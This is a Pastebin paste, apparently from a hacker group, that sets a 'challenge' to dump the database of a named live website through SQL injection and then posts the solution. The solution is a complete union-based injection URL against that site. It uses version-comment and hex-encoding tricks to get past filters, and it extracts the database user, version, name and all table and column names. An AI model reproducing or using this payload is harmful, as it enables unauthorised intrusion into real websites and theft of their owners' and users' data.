API tools faq
paste
Advertisement
bilasi

Bouabid Challenge Solution

bilasi
Jun 4th, 2016
563
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
SQL 0.86 KB | None | 0 0
raw download clone embed print report
  1. Bouabid challenge:
  2. ===================
  3. after long TIME we back!!
  4. challenge TYPE : SQL
  5. target url/Point : http://www.daynghesq.com/?frame=product&cat=180%27
  6. task AND rules :  don't change point, do it with (pure union based,$_Get) dios the database, then post your proof, ah don't forget pm your query !!!
  7. another rules IGNORE Ali Malik post ON same target expressionless emoticon
  8. Level : Easy
  9. Proof ~:
  10.  
  11. Solution:
  12. ==========
  13. http://www.daynghesq.com/?frame=product&cat=-180  UNION /*!50000Select*/ 1,2,CoNcAt(0x44697075,0x3c62723e,USER(),0x3c62723e,version(),0x3c62723e,DATABASE(),0x3c62723e,GRoUp_cOnCat(0x3c62723e,CONVERT(/*!13337table_name*/ USING latin1),0x3a3a3a,CONVERT(/*!13337column_name*/ USING latin1))),4,5,6,7,8,9,10,11,12,13,14 /*!50000FROM*/ /*!12345INFORMATION_SCHEMA.columns*/  WHERE table_schema NOT LIKE 0x696e666f726d6174696f6e5f736368656d61-- -
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!